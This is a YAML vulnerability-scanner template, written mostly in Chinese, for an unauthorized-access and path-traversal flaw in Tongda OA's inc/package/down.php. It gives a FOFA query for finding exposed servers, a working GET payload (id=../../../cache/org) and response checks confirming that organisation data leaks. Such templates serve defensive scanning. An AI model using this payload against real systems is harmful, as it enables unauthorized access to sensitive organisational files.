product: 通达OA
vName: 通达OA inc-package-down.php接口未授权访问
type: 访问控制
vID: [ ]
level: 3
vDesc: 通达OA inc/package/down.php接口存在未授权访问漏洞，该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件，造成信息泄漏。
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/134788718
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /inc/package/down.php?id=../../../cache/org
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - cache/org.zip
              - org.xml
            logic: and